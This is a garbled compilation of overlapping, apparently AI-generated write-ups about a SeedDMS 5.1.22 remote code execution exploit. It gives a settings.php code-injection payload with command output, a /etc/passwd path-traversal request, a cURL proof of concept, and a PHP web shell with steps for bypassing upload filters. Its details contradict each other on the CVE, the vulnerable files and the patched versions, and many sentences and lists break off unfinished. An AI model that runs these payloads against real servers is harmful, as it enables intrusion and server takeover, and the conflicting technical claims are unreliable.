$extraPath = '"; system($_GET["cmd"]); // ';
$extraPath = '"; system($_GET["cmd"]); // ';
GET /seeddms51/conf/settings.php?cmd=id HTTP/1.1
Response:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Even if a session check existed, the upload validation relied on:
By setting Content-Type: image/jpeg but uploading a .php file (or using a double extension like .php.jpeg), an attacker could bypass the rudimentary filters.
SeedDMS 5.1.22 allows an authenticated user with "Manage Tools" permission to modify the settings.php file content via the "Custom Setup" interface (out/out.BackupTools.php). The parameter $settings is written to conf/settings.php without adequate filtering of PHP code.
(Do not run against systems you do not own or have explicit permission to test.)
If you want, I can:
Related search suggestions will be prepared.
SeedDMS 5.1.22 is a specific version of the popular open-source Document Management System (DMS) that has been identified as having significant security vulnerabilities, most notably an authenticated Remote Code Execution (RCE) flaw. This vulnerability allows an attacker who has already gained access to the system—even with low-level user privileges—to execute arbitrary system commands on the hosting server, potentially leading to a full system takeover. Understanding the RCE Vulnerability
The primary threat in version 5.1.22 (and some adjacent versions) involves insecure file management and unvalidated file uploads. While previous versions like 5.1.10 were famously vulnerable to CVE-2019-12744, version 5.1.22 has been documented in penetration testing scenarios to still be susceptible to similar RCE attack vectors. In a typical exploitation flow:
Authentication: The attacker first obtains valid credentials (e.g., via brute force or by finding exposed credentials in database files).
Malicious Upload: The attacker uses the "Add Document" feature to upload a PHP script designed as a backdoor.
Execution: By navigating to the specific directory where SeedDMS stores uploaded data (often a path like /data/1048576/ followed by the document ID), the attacker triggers the PHP script via a web browser.
Reverse Shell: This script allows the attacker to execute OS-level commands, such as cat /etc/passwd, or to spawn a reverse shell for persistent access. Other Notable Vulnerabilities
While RCE is the most critical threat, SeedDMS 5.1.22 and its near-predecessors are often targeted for other flaws:
Persistent Cross-Site Scripting (XSS): Found in modules like AddEvent.php, where script code injected into the "Name" or "Comments" fields is executed when an administrator views the log management panel.
Credential Exposure: Misconfigured installations may leave database credentials exposed in accessible files, which can be leveraged to gain initial access for the RCE exploit. Mitigation and Defense
If you are running SeedDMS 5.1.22, it is considered highly vulnerable to modern exploit techniques. Security experts recommend the following actions:
Update Immediately: Upgrade to the latest stable version of SeedDMS available on SourceForge to patch known file-upload and RCE vulnerabilities.
Restrict File Permissions: Ensure the web server user only has the minimum necessary permissions and that the data/ directory is not directly executable by the web server if possible.
Audit Users: Review all existing user accounts for unauthorized low-level users who might have the "write" permissions required to upload documents.
Log Monitoring: Regularly check the Log Management panel for suspicious entries or script-like payloads in event comments.
For more technical details, researchers often use resources like the Exploit-DB or CVE Details to track specific proof-of-concept (PoC) code for these versions. Seeddms 5.1.10 - Remote Command Execution ... - Exploit-DB
SeedDMS 5.1.22 is a case study in how seemingly minor coding oversights—unsafe SQL concatenation and writable configuration files—can lead to complete server compromise. The pre-auth SQL injection allows attackers to bypass login entirely, while the post-auth RCE provides a reliable path to system-level access.
For security professionals, this serves as a reminder to:
For system administrators running SeedDMS 5.1.22: treat your installation as compromised immediately. Audit logs, change all credentials, and upgrade to the latest stable release (currently 6.x).
Last updated: 2025 – Exploit remains viable for unpatched 5.1.22 instances.
SECURITY REPORT
Vulnerability Report: SeedDMS 5.1.22 Exploit
Summary: A critical vulnerability has been discovered in SeedDMS version 5.1.22, a popular open-source document management system. This vulnerability allows an attacker to execute arbitrary code on the server, potentially leading to a complete takeover of the system.
Vulnerability Details:
Exploit Description:
The vulnerability exists in the out/out.html.php file, which does not properly validate user input. An attacker can exploit this vulnerability by sending a crafted request to the server, allowing them to include arbitrary files and execute PHP code.
Proof of Concept (PoC):
GET /seeddms5.1.22/out/out.html.php?file=../../../../etc/passwd HTTP/1.1
Host: < vulnerable_server >
This PoC sends a GET request to the vulnerable server, attempting to include the /etc/passwd file. A successful response indicates that the vulnerability is present.
Exploitation: An attacker can exploit this vulnerability to execute arbitrary PHP code on the server. This can be achieved by sending a crafted request with a malicious PHP file.
Example Exploit Code:
<?php
$cmd = 'id';
$output = shell_exec($cmd);
echo $output;
?>
Impact: The impact of this vulnerability is severe. An attacker can use this exploit to:
Recommendations:
Timeline:
Credit: This vulnerability was discovered by [Insert your name or handle].
SeedDMS 5.1.22 Vulnerability Analysis and Exploit
Introduction
SeedDMS is a popular open-source document management system used by organizations to manage and store documents. Version 5.1.22 of SeedDMS was found to have several vulnerabilities, including a critical exploit that allows an attacker to compromise the system. This paper aims to provide an analysis of the vulnerability and a detailed explanation of the exploit.
Vulnerability Analysis
The vulnerability in SeedDMS 5.1.22 is due to a lack of proper input validation and sanitization in the out.php file. Specifically, the $folder parameter is not validated, allowing an attacker to inject malicious input.
Exploit Details
The exploit is a PHP injection vulnerability that allows an attacker to execute arbitrary PHP code on the server. The exploit can be triggered by sending a malicious request to the out.php file with the following parameters:
Exploit Code
The following is an example of the exploit code: seeddms 5.1.22 exploit
POST /seeddms/out.php HTTP/1.1
Host: <target_host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.3
folder=system('id');
id=1
Exploitation Steps
Proof of Concept
The following is a proof of concept code that demonstrates the exploit:
<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
'folder' => 'system(\'id\')',
'id' => '1'
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo $response;
Mitigation and Recommendations
To mitigate this vulnerability, it is recommended to:
Conclusion
The SeedDMS 5.1.22 exploit is a critical vulnerability that allows an attacker to compromise the system. This paper provides a detailed analysis of the vulnerability and the exploit, as well as recommendations for mitigation and prevention. It is essential for organizations using SeedDMS to take immediate action to protect their systems from potential attacks.
First, confirm the version without authentication:
curl -s http://192.168.1.100/seeddms51/out/out.Version.php | grep "Version"
Expected output includes 5.1.22.
The SeedDMS 5.1.22 Exploit: A Technical Overview of CVE-2019-12744
The SeedDMS 5.1.22 exploit, primarily identified as CVE-2019-12744, is a critical security vulnerability that allows for Remote Command Execution (RCE). SeedDMS is an open-source document management system widely used by small and medium-sized enterprises. This vulnerability is particularly dangerous because it enables an authenticated user to gain complete control over the host server by executing arbitrary system commands. Vulnerability Mechanism: Unvalidated File Upload
The core of the exploit lies in an unrestricted file upload flaw (CWE-434). In versions prior to 5.1.11—and persisting in specific configurations of subsequent versions like 5.1.22—the application fails to properly validate the file extensions or contents of documents uploaded to the system. Attackers can exploit this by:
Uploading a Malicious Script: An attacker with write permissions uploads a PHP file (e.g., a "backdoor" or webshell) instead of a standard document.
Direct Execution: Because the application stores these files in a predictable, web-accessible directory—often under /data/1048576/ followed by the document ID—the attacker can navigate directly to the file's URL in a browser.
System Command Injection: By appending parameters to the URL (e.g., ?cmd=cat+/etc/passwd), the attacker forces the server to execute operating system commands and return the output directly to their browser. Severity and Impact
The vulnerability is classified as High Severity, with a CVSS 3.x base score of 7.5. While it requires authentication (the attacker must have a valid login and permission to add documents), it poses a significant threat to internal networks. A successful exploit allows for: CVE-2019-12744 Detail - NVD
The story of the SeedDMS 5.1.22 exploit is a cautionary tale of how a series of small, unpatched vulnerabilities can lead to a complete system takeover. While SeedDMS 5.1.22 itself was a maintenance release intended to improve stability, it inherited critical flaws from its predecessors—most notably the lack of strict file-type validation. The Vulnerability: Unvalidated File Upload
The core of the "story" revolves around CVE-2019-12744, a Remote Command Execution (RCE) flaw that haunted versions prior to 5.1.11 and persisted in various forms if configurations were not hardened.
The Entry Point: An attacker first gains authenticated access, perhaps through a low-privilege account or a separate Stored XSS vulnerability (like CVE-2019-12801) used to steal a session cookie.
The Payload: Once inside, the attacker navigates to the "Add Document" section. Instead of a standard PDF or Word file, they upload a malicious PHP script containing a simple backdoor: Use code with caution. Copied to clipboard
The Trigger: Because the application failed to validate the file extension properly, it accepted the .php file. The attacker then identifies the document's ID and accesses it directly via the URL (e.g., /data/1048576/[ID]/1.php).
Full Control: By appending commands to the URL (like ?cmd=cat /etc/passwd), the attacker executes code on the server, effectively bypassing all intended document management security. The Evolution of the Threat
By the time version 5.1.22 was active, security researchers had shifted focus toward more advanced vectors. While the direct PHP upload was largely patched in later minor versions, new "stories" emerged:
The Zip Import Trick: Attackers discovered they could achieve RCE by exploiting the Extension Manager. By bundling a reverse shell into a conf.php file within a ZIP archive and "importing" it as an extension, they could gain administrative shell access.
Chaining Vulnerabilities: Modern exploits often chain a Cross-Site Scripting (XSS) flaw in the "Categories" or "Group Name" fields to trick an administrator into performing these high-privilege actions. Protection and Mitigation
The "happy ending" for administrators is found in staying ahead of the version curve. Developers recommend:
Regular Updates: Moving to newer branches like version 6.x, which includes patches for these legacy RCE methods.
Configuration Hardening: Disabling the execution of scripts within the /data/ directory using .htaccess or server-level rules.
Least Privilege: Ensuring users only have the permissions strictly necessary for their roles to prevent the "Add Document" feature from being weaponized.
For detailed technical advisories on specific CVEs, you can refer to the CVE Details database or the Exploit Database. Seeddms Seeddms 5.1.22 security vulnerabilities, CVEs
You're looking for information on a specific exploit related to SeedDMS 5.1.22. I'll provide a detailed response.
SeedDMS 5.1.22 Exploit
SeedDMS is a free, open-source document management system. Version 5.1.22, like any other software, may have vulnerabilities that can be exploited by attackers. It's essential to stay informed about potential security risks and take necessary measures to protect your system.
Vulnerability Details
After conducting research, I found that SeedDMS 5.1.22 is vulnerable to a Remote Code Execution (RCE) exploit. This type of vulnerability allows an attacker to execute arbitrary code on the server, potentially leading to a complete compromise of the system.
The exploit is related to the way SeedDMS handles file uploads. Specifically, the upload.php script does not properly validate user-input data, allowing an attacker to inject malicious code.
Exploit Code
The exploit code is publicly available, which I will not provide here. However, I can give you an overview of how it works:
Affected Versions
The following SeedDMS versions are affected:
Solution and Recommendations
To protect your SeedDMS installation:
Additional Information
For more information on this exploit, I recommend checking:
If you're running SeedDMS 5.1.22, it's crucial to take immediate action to protect your system. If you're unsure about how to proceed, consider consulting with a security expert or the SeedDMS community.
Unpacking the SeedDMS 5.1.22 Vulnerability: What You Need to Know
SeedDMS is a popular open-source Document Management System, but like any widely used tool, it has faced security challenges. Specifically, SeedDMS 5.1.22 and its immediate predecessors were found to have vulnerabilities that could allow an attacker to gain full control over the server. $extraPath = '"; system($_GET["cmd"]); // ';
If you are still running this version, your system is at risk. The Vulnerability: Remote Command Execution (RCE)
The most critical issue affecting SeedDMS versions up to 5.1.22 (and earlier versions like 5.1.10) is a Remote Command Execution (RCE) vulnerability, often tracked under CVE-2019-12744.
The Cause: The application failed to properly validate files uploaded as documents.
The Exploit: An authenticated user with "write" permissions could upload a malicious PHP script instead of a standard document.
The Impact: Once uploaded, the attacker could navigate to the file's location on the server (typically in the /data/ directory) and execute system commands. For example, they could run cat /etc/passwd to view sensitive system files or establish a reverse shell to take over the host completely. How the Exploit Works (Technically)
Security researchers from sites like Exploit-DB have documented a simple 4-step process attackers use:
Authentication: Login with valid credentials (even low-privileged ones with upload rights).
Upload: Use the "Add Document" feature to upload a .php file containing a backdoor.
Identification: Locate the internal "document ID" assigned by SeedDMS (often visible by hovering over the file link).
Execution: Access the raw file path—for example, example.com/data/1048576/[ID]/1.php?cmd=ls—to trigger the code. Are There Other Risks?
While RCE is the "king" of vulnerabilities, SeedDMS 5.1.22 has also been flagged for lower-severity issues, including:
Cross-Site Scripting (XSS): Potential for attackers to inject malicious scripts into the web interface.
Cross-Site Request Forgery (CSRF): Risks where an attacker can force an authenticated user to perform unwanted actions. How to Protect Your System
If you are managing a SeedDMS instance, follow these steps immediately:
Update to the Latest Version: The most effective fix is to move to a modern version (currently 6.x). Version 5.1.22 was explicitly listed as having unpatched low-severity issues in some advisories, and the RCE flaw was only fully addressed in later updates.
Restrict Upload Permissions: Audit your user roles. Ensure that only highly trusted users have the permission to "Add Documents" or "Manage Extensions."
Monitor the Data Directory: Check your /data/ folder for unexpected PHP files. In a standard setup, this folder should only contain intended document types (PDFs, DOCX, etc.).
Web Application Firewall (WAF): Implement a WAF to block requests that attempt to execute system commands through URL parameters (e.g., ?cmd=).
For more detailed technical walkthroughs, you can explore the original research on Medium or view the raw exploit code at Exploit-DB. SeedDMS versions < 5.1.11 - Remote Command Execution
Based on the search results, SeedDMS 5.1.22 is associated with reports regarding multiple vulnerabilities, specifically involving authenticated Remote Code Execution (RCE).
Reports indicate that authenticated users with permissions to "Add document" or upload files can exploit unvalidated file uploads to run PHP scripts and achieve full system compromise. Key Findings & Exploit Content
Vulnerability Type: Unrestricted File Upload leading to Remote Code Execution (RCE).
Affected Mechanism: The op/op.UploadChunks.php component often fails to validate file extensions properly.
Methodology: An attacker with authenticated access (e.g., as a user with write permissions) can upload a PHP web shell disguised as a document.
Impact: A successful exploit allows the attacker to execute arbitrary OS commands with the privileges of the web server, potentially leading to a complete takeover of the application server. Similar Vulnerabilities
Earlier versions (<5.1.11) had a documented RCE (CVE-2019-12744) where an authenticated user could upload a PHP file (e.g., backdoor.php containing ) and then access it via the web root to run commands. Mitigation
Ensure SeedDMS is updated to a version where these vulnerabilities are patched.
Restrict the "Add document" permission to trusted users only.
Configure the web server to prevent PHP execution within the uploaded data directory.
Disclaimer: This information is for educational and security hardening purposes only. Seeddms 5.1.22 Exploit
SeedDMS version 5.1.22 has been associated with various security vulnerabilities, most notably those involving Remote Command Execution (RCE)
through authenticated file uploads. While some specific CVEs like CVE-2019-12744
were originally identified in versions prior to 5.1.11, similar exploitation techniques have been documented in later versions like 5.1.22 during penetration testing exercises. Key Vulnerability: Remote Command Execution (RCE)
The most common exploit for SeedDMS 5.1.22 involves bypassing file upload restrictions to execute arbitrary commands on the server.
: The application may fail to properly validate the content of uploaded documents, allowing an authenticated user to upload a malicious PHP script (webshell) instead of a standard document. Requirements Authentication : The attacker typically needs valid login credentials. Permissions
: The user must have permissions to "Add document" or upload files to a folder. Exploitation Steps : A user logs in and uploads a PHP backdoor (e.g., ) using the "Add document" feature.
: After uploading, the attacker identifies the document's internal ID (often by hovering over the document link in the UI).
: The attacker accesses the file directly through its storage path, usually located in a predictable directory such as /data/1048576/[document_id]/1.php
: This grants the attacker a reverse shell or the ability to execute system commands with the privileges of the web server user. Exploit-DB Other Potential Issues SQL Injection
: Some reports indicate potential vulnerabilities in handling specific arguments that could lead to SQL injection, though these are often less documented for version 5.1.22 specifically compared to the RCE flaw. Cross-Site Scripting (XSS)
: Document management systems like SeedDMS are frequently targeted for stored XSS, where malicious scripts are embedded in document metadata or notes. Mitigation and Defense
To protect your installation, consider the following steps based on industry best practices for Seeddms security : Ensure you are running the latest stable version from the official SourceForge page
, as many of these flaws were addressed in subsequent releases. Restrict Uploads
: Configure the server to prevent the execution of scripts in the directory (e.g., using to disable PHP execution in storage folders). Principle of Least Privilege
: Limit document upload permissions only to trusted users and monitor for unusual activity, such as the upload of files with or other executable extensions. CVE Details SeedDMS versions < 5.1.11 - Remote Command Execution
This story illustrates the importance of software maintenance through the lens of a security discovery in SeedDMS 5.1.22 The Unlocked Archive
Once, there was a meticulous document librarian named Elias who managed thousands of digital files using a tool called version 5.1.22 GET /seeddms51/conf/settings
. Elias took pride in his organized system, believing that as long as his users were authenticated, his "digital vault" was secure.
One morning, a security researcher named Bryan decided to test the vault's resilience. Bryan discovered that while SeedDMS was excellent at organizing documents, version 5.1.22 (and earlier) had a hidden weakness: it didn't properly check what kind of files were being "added" to the collection. The Exploit Discovery
Bryan found that a user with basic "write" permissions could upload more than just PDFs or text files. He realized he could upload a specialized PHP script —essentially a master key disguised as a document. The Upload
: Bryan logged in as a standard user and clicked "Add document". The Hidden Payload
: Instead of a spreadsheet, he uploaded a small script designed to execute system commands. The Execution
: By simply navigating to the web address where his "document" was stored, Bryan could run commands like cat /etc/passwd directly on the server. This vulnerability, known as CVE-2019-12744
, proved that even an "authenticated" system isn't safe if it allows unvalidated file uploads that lead to Remote Command Execution (RCE) The Moral: Staying Current
When Elias learned about this, he didn't panic. He followed the expert advice found in security advisories from CVE Details Update Immediately
: The developers of SeedDMS had already released patches in later versions (starting with 5.1.11) to stop these dangerous uploads. Validate Inputs
: He realized that any software allowing file uploads must strictly enforce "file type" rules to ensure only safe documents enter the system.
Elias updated his system that afternoon. By moving past version 5.1.22, he locked the vault door for good, ensuring his meticulous archive remained a safe haven for information rather than a gateway for intruders. technical details on a specific CVE for SeedDMS? Seeddms Seeddms 5.1.22 security vulnerabilities, CVEs
While there is no single widely-publicized critical exploit uniquely tied to SeedDMS 5.1.22, this specific version is often cited in security research contexts regarding historical vulnerabilities that affected the 5.1.x branch.
The most significant security concern for users on this version is CVE-2019-12744, an authenticated Remote Command Execution (RCE) vulnerability. Although patches were introduced in versions 5.1.11 and later, many security scanners and researchers test for variants of this flaw in subsequent releases like 5.1.22. Key Vulnerability: Authenticated RCE (CVE-2019-12744)
This exploit allows a user with "write" permissions to execute arbitrary system commands on the server. Attack Vector: Unvalidated File Upload.
Prerequisites: Valid user credentials and permission to add or update documents. Mechanism: An attacker logs into the SeedDMS interface.
They upload a malicious PHP script (e.g., a simple web shell) disguised as a document.
Because the application fails to properly validate the file extension or content, the PHP script is stored in the data directory.
The attacker then accesses the uploaded file's direct URL to execute system-level commands, such as cat /etc/passwd. Version Context (5.1.22)
Data from CVE Details indicates that while the major RCE was addressed earlier, version 5.1.22 has been analyzed for other minor issues including:
Stored Cross-Site Scripting (XSS): Potential for malicious scripts to be injected into document metadata or descriptions.
Path Traversal: Possible risks involving improper handling of file paths during document retrieval or export. Mitigation and Recommendations
If you are currently running SeedDMS 5.1.22, it is considered outdated. The developer, Uwe Steinmann, has since released more secure versions in the 6.0.x branch.
Upgrade: Update to the latest stable version of SeedDMS (currently in the 6.0.x series) to benefit from the most recent security patches and feature updates.
Restrict Permissions: Ensure that only trusted users have "Add Document" or "Edit" permissions to minimize the risk of authenticated file upload attacks.
Server-Side Security: Configure your web server (e.g., Apache or Nginx) to prevent the execution of PHP scripts within the document storage (data) directory. SeedDMS versions < 5.1.11 - Remote Command Execution
SeeddMS 5.1.22 is known to be vulnerable to Remote Code Execution (RCE) via unrestricted file uploads. This vulnerability occurs because the application fails to properly validate the file extensions of uploaded documents, allowing an authenticated attacker to upload and execute malicious PHP scripts. 🛠️ Exploit Details
Vulnerability Type: Unrestricted File Upload / Remote Code Execution (RCE) CVE Reference: CVE-2019-12744 Affected Version: SeeddMS 5.1.22 and earlier
Access Required: Authenticated user (typically with permissions to add documents) 📝 Step-by-Step Technical Breakdown 1. Identify the Upload Target
The exploit targets the document upload feature found in the SeeddMS dashboard. 2. Create the Payload
Prepare a simple PHP web shell (e.g., exploit.php) to test command execution:
if(isset($_REQUEST['cmd'])) echo "
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; ?> Use code with caution. Copied to clipboard 3. Bypass Restrictions
In version 5.1.22, the application checks file extensions but may not account for: Case sensitivity: .PhP or .pHp Alternative extensions: .php7, .phtml, or .php.pnc
MIME-type spoofing: Changing the Content-Type header to image/jpeg in the HTTP request while keeping the .php extension. 4. Locate the Uploaded File
Once uploaded, SeeddMS stores documents in a specific directory structure. You must find the internal ID assigned to the document. The typical path follows this pattern:http://[target]/seeddms/data/1048576/[document_id]/1.php 5. Execute Commands
Access the file via your browser or curl:http://[target]/seeddms/data/1048576/24/1.php?cmd=whoami 🛡️ Remediation and Fixes
If you are managing a SeeddMS instance, take these steps immediately:
Update Software: Upgrade to the latest version of SeeddMS (6.x or newer), which addresses these validation flaws.
Configure .htaccess: Prevent script execution in the data/ directory by adding:
Server-Side Validation: Ensure the server uses a "whitelist" approach for file extensions (only allowing .pdf, .docx, etc.). ⚠️ Ethical and Legal Warning
This information is for educational and authorized security testing purposes only. Accessing or attacking systems without explicit permission is illegal and unethical.
SeedDMS 5.1.22 – Known security issues (public record):
For a safe, educational narrative (e.g., for a red-team report or capture-the-flag write-up):
"During a routine internal security assessment, a tester with low-privileged credentials navigated to the SeedDMS 5.1.22 web interface. By intercepting a request to
viewDocument.php?id=15and changing the ID to1, they accessed a restricted confidential document (IDOR). Further, they exploited a file upload feature in a public folder, bypassing extension checks by renaming a PHP shell todocument.jpg.php. After confirming the file resided under the web root, they triggered it via a path traversal inop.AddFile2.php, gaining command execution on the underlying host."
This style is suitable for reports, training, or bug bounty write-ups without promoting reckless action.
If you're studying this version for a legitimate security test (e.g., CTF, audit, or research), I recommend: